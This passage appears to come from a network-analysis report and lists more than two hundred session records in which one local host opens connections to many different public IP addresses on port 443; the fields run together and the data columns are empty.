                                            10140192.168.2.2332844154.147.135.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10141192.168.2.2356558208.76.98.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10142192.168.2.2346606196.59.70.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10143192.168.2.2333078151.30.81.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10144192.168.2.235411236.203.51.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10145192.168.2.2349094221.29.90.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10146192.168.2.2334326182.98.121.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10147192.168.2.233733898.4.10.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10148192.168.2.233302678.53.117.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10149192.168.2.2354992198.251.188.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10150192.168.2.2340744191.174.65.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10151192.168.2.233565667.141.87.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10152192.168.2.233718827.217.59.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10153192.168.2.2336598188.109.150.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10154192.168.2.2341558104.211.154.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10155192.168.2.234579654.1.109.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10156192.168.2.2349946115.120.16.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10157192.168.2.23335068.70.18.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10158192.168.2.233447076.18.23.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10159192.168.2.233694017.15.34.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10160192.168.2.2347280172.174.19.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10161192.168.2.2357394100.209.86.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10162192.168.2.2355836162.8.77.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10163192.168.2.235721053.122.175.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10164192.168.2.2355672172.213.126.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10165192.168.2.234082427.41.253.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10166192.168.2.2341038219.141.127.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10167192.168.2.2359842168.214.172.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10168192.168.2.233918266.77.112.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10169192.168.2.2336174204.232.240.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10170192.168.2.2351638153.141.50.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10171192.168.2.235287636.167.138.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10172192.168.2.2359472119.216.176.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10173192.168.2.2338880163.42.89.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10174192.168.2.234729041.249.202.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10175192.168.2.2356188162.195.113.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10176192.168.2.23553884.1.148.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10177192.168.2.2358028101.143.5.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10178192.168.2.233324293.219.239.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10179192.168.2.2345684136.10.51.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10180192.168.2.235197038.186.3.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10181192.168.2.2339074222.219.64.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10182192.168.2.2345944118.161.146.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10183192.168.2.2340446129.194.118.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10184192.168.2.23400601.0.128.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10185192.168.2.2359950191.204.30.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10186192.168.2.235820661.100.163.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10187192.168.2.2349764121.244.204.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10188192.168.2.2339604152.138.211.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10189192.168.2.23528889.51.238.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10190192.168.2.235028427.225.48.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10191192.168.2.234679250.101.106.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10192192.168.2.236043896.3.183.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10193192.168.2.235774669.229.62.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10194192.168.2.233484881.201.156.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10195192.168.2.2345518134.91.54.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10196192.168.2.2355908135.234.13.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10197192.168.2.234468681.139.203.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10198192.168.2.235608676.212.22.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10199192.168.2.233976678.100.40.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10200192.168.2.2333102112.133.161.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10201192.168.2.2345388143.107.49.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10202192.168.2.234342431.44.73.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10203192.168.2.23588744.26.61.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10204192.168.2.2356818107.127.121.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10205192.168.2.2350400201.207.125.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10206192.168.2.233571627.152.248.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10207192.168.2.2336322113.145.225.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10208192.168.2.2335914219.242.44.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10209192.168.2.233664235.209.89.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10210192.168.2.2344040118.107.110.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10211192.168.2.236069895.35.247.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10212192.168.2.2337676217.134.235.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10213192.168.2.234137266.29.94.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10214192.168.2.235262863.71.231.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10215192.168.2.2339454162.16.231.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10216192.168.2.235604423.163.195.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10217192.168.2.2340086206.168.55.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10218192.168.2.2356684133.76.60.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10219192.168.2.2343256173.130.166.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10220192.168.2.234798478.59.198.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10221192.168.2.2339928191.144.3.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10222192.168.2.2353364115.215.147.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10223192.168.2.2355014145.230.229.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10224192.168.2.2336700165.213.176.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10225192.168.2.234935063.165.194.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10226192.168.2.2355446143.54.239.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10227192.168.2.2350428170.161.38.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10228192.168.2.2341976201.0.234.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10229192.168.2.235804471.233.45.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10230192.168.2.235390420.90.218.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10231192.168.2.234427019.211.33.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10232192.168.2.2343642104.218.191.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10233192.168.2.2337286169.241.1.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10234192.168.2.234063268.27.121.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10235192.168.2.234112673.148.59.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10236192.168.2.2332830137.201.162.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10237192.168.2.2337934207.199.15.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10238192.168.2.235305212.157.80.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10239192.168.2.2358808192.120.150.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10240192.168.2.2355790100.203.143.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10241192.168.2.2353530177.249.187.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10242192.168.2.2358970101.14.53.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10243192.168.2.2360020211.179.12.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10244192.168.2.234499468.155.149.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10245192.168.2.234369873.121.23.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10246192.168.2.236023099.141.141.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10247192.168.2.233486424.223.254.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10248192.168.2.2350718176.215.111.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10249192.168.2.235649031.48.32.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10250192.168.2.2353748188.168.241.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10251192.168.2.2350976213.98.12.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10252192.168.2.2360972131.18.238.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10253192.168.2.2336226203.216.205.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10254192.168.2.233858494.185.106.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10255192.168.2.235154667.1.130.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10256192.168.2.2335356115.5.16.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10257192.168.2.2349704157.0.183.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10258192.168.2.2335404197.150.35.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10259192.168.2.2347538199.198.68.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10260192.168.2.235480218.161.38.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10261192.168.2.235330647.172.254.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10262192.168.2.2347702201.143.101.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10263192.168.2.2359998187.72.226.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10264192.168.2.234212638.70.212.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10265192.168.2.235617470.8.135.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10266192.168.2.234926636.19.141.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10267192.168.2.2333020165.96.116.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10268192.168.2.2340904192.20.240.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10269192.168.2.2356572205.64.12.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10270192.168.2.2356488185.132.52.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10271192.168.2.2347000198.202.63.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10272192.168.2.2341614134.152.31.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10273192.168.2.2355986131.97.219.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10274192.168.2.2350166191.194.187.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10275192.168.2.235336648.115.112.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10276192.168.2.233983450.181.34.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10277192.168.2.233684823.206.4.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10278192.168.2.2352272138.248.97.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10279192.168.2.2348748222.109.32.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10280192.168.2.2344446219.20.56.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10281192.168.2.233961446.31.2.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10282192.168.2.2337038209.7.197.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10283192.168.2.235177675.156.247.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10284192.168.2.234867066.39.159.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10285192.168.2.2358964209.255.139.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10286192.168.2.235090092.214.110.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10287192.168.2.2358968205.162.248.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10288192.168.2.2355064139.121.57.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10289192.168.2.2340992162.148.188.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10290192.168.2.2352078183.46.185.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10291192.168.2.23570644.146.224.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10292192.168.2.235831449.143.113.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10293192.168.2.234633648.39.222.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10294192.168.2.234883283.61.32.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10295192.168.2.23419984.238.247.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10296192.168.2.235830085.255.14.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10297192.168.2.235924418.128.34.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10298192.168.2.235710699.55.59.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10299192.168.2.234612489.152.90.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10300192.168.2.235374850.241.235.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10301192.168.2.2340564126.83.110.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10302192.168.2.2341948175.6.253.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10303192.168.2.234141082.255.179.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10304192.168.2.234168020.242.58.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10305192.168.2.2350542186.176.144.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10306192.168.2.2344186196.130.147.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10307192.168.2.233786499.243.252.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10308192.168.2.234386481.127.41.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10309192.168.2.2341294195.220.109.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10310192.168.2.2338554110.158.150.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10311192.168.2.2354824163.253.139.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10312192.168.2.2341942151.219.165.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10313192.168.2.234917249.15.164.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10314192.168.2.233440862.241.149.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10315192.168.2.234140851.87.46.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10316192.168.2.233960682.136.79.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10317192.168.2.2343564220.108.8.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10318192.168.2.235303297.155.145.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10319192.168.2.233782227.252.107.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10320192.168.2.233439850.156.130.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10321192.168.2.234949224.200.172.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10322192.168.2.2342238202.44.195.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10323192.168.2.2355598144.111.10.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10324192.168.2.233692472.159.242.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10325192.168.2.2356718188.211.32.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10326192.168.2.2341160194.143.25.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10327192.168.2.2337028169.68.239.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10328192.168.2.2348542177.39.42.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10329192.168.2.2360370204.206.84.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10330192.168.2.2343542204.215.193.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10331192.168.2.234048444.65.65.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10332192.168.2.235664420.35.16.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10333192.168.2.2336824194.191.119.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10334192.168.2.2357776197.204.53.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10335192.168.2.2333584132.19.215.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10336192.168.2.234641618.237.131.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10337192.168.2.2342198176.248.231.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10338192.168.2.235993672.224.54.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10339192.168.2.2339286204.127.187.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10340192.168.2.235334214.93.111.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10341192.168.2.233996065.116.128.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10342192.168.2.2346362105.149.130.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10343192.168.2.233330236.148.244.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10344192.168.2.2345496147.63.61.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10345192.168.2.2354514212.62.197.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10346192.168.2.2360088157.58.44.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10347192.168.2.2351504140.208.252.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10348192.168.2.234413287.224.37.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10349192.168.2.2346380213.10.0.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10350192.168.2.234780678.192.197.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10351192.168.2.2341644193.215.3.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10352192.168.2.2335508173.165.156.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10353192.168.2.235847064.108.166.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10354192.168.2.235390424.105.105.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10355192.168.2.2353998126.214.62.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10356192.168.2.235967671.231.112.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10357192.168.2.2338156146.140.165.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10358192.168.2.2356420105.10.208.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10359192.168.2.2353910182.103.254.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10360192.168.2.2346624202.31.227.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10361192.168.2.233602277.69.205.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
